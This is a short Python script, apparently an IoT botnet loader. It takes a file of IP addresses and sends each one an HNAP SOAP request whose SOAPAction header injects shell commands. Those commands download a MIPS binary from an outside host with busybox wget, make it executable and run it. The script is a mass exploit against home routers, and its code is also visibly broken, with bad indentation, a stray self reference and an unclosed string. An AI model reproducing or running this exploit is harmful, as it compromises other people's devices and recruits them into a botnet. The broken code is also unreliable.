1
#! python !#
2
import threading, sys, time, random, socket, re, os, requests
3
from Queue import *
4
from sys import stdout
5
from threading import Thread
6

7

8
ips = open(sys.argv[1], "r").readlines()
9
queue = Queue()
10
queue_count = 0
11
payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><AddPortMapping xmlns=\"http://purenetworks.com/HNAP1/\"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>"
12
headerlist = {'SOAPAction': 'http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp; busybox wget http://1.1.1.1/bins/mips; chmod 777 mips; ./mips hnap.exploit`'}
13

14
		def hnap(host):
15
			try:
16
				print "Loading " + self.ip
17
				url = "http://" + self.ip + /HNAP1"
18
				requests.post(url, timeout=5, headers=headerlist, data=payload)
19

20
    except:
21
        pass
22
    return
23

24
def main():
25
    global queue_count
26
    for line in ips:
27
        line = line.strip("\r")
28
        line = line.strip("\n")
29
        queue_count += 1
30
        sys.stdout.write("\r[%d] Added to queue" % (queue_count))
31
        sys.stdout.flush()
32
        queue.put(line)
33
    sys.stdout.write("\n")
34
    i = 0
35
    while i != queue_count:
36
        i += 1
37
        try:
38
            input = queue.get()
39
            thread = Thread(target=hnap, args=(input,))
40
            thread.start()
41
        except KeyboardInterrupt:
42
            sys.exit("Interrupted? (ctrl + c)")
43
    thread.join()
44
    return
45

46
if __name__ == "__main__":
47
    main()
48